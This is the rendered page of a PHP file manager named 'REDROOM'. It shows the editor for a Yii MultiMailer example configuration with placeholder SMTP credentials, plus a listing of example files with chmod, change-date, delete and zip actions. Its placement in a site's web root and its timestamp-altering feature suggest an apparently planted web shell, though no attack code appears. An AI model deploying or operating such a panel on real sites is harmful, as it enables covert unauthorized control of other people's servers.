REDROOM
PHP 8.1.33
Path:
Logout
Edit File
Size: 1.65 KB
Close
/home/jambtst2015/public_html/protected/extensions/yii-multimailer/Examples/all-default-options.php
Text
Base64
<?php /** * @author Pawel Bizley Brzozowski * @version 1.0 * * MultiMailer list of all default configuration options here so you can see * what is unnecessary to set. */ /** * ----------------------------------------------------------------------------- * Configuration: * <Yii directory>/protected/config/main.php * ----------------------------------------------------------------------------- */ return array( // ... 'components' => array( // ... 'MultiMailer' => array( 'setMethod' => 'MAIL', 'setContentType' => 'html', 'setFromAddress' => '', 'setFromName' => '', 'setReplyAddress' => '', 'setReplyName' => '', 'setSameReply' => true, 'setLogging' => true, 'setDbModel' => '', 'setDbModelColumns' => array( 'email' => 'email', 'name' => 'name', 'subject' => 'subject', 'body' => 'body', 'alt' => 'alt', ), 'setExternalExceptions' => true, 'setOptions' => array( 'CharSet' => 'UTF-8', 'SMTPDebug' => 0, 'Debugoutput' => 'html', 'Host' => 'mail.example.com', 'Port' => 25, 'SMTPAuth' => true, 'Username' => 'yourname@example.com', 'Password' => 'yourpassword', ), ), // ... ), // ... );
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 5
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
all-default-options.php
1.65 KB
lrw-r--r--
2024-11-22 17:53:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
default-db.php
2.92 KB
lrw-r--r--
2024-11-22 17:53:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
default-mail.php
1.63 KB
lrw-r--r--
2024-11-22 17:53:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
default-smtp.php
1.87 KB
lrw-r--r--
2024-11-22 17:53:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
mail-with-template.php
2.13 KB
lrw-r--r--
2024-11-22 17:53:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).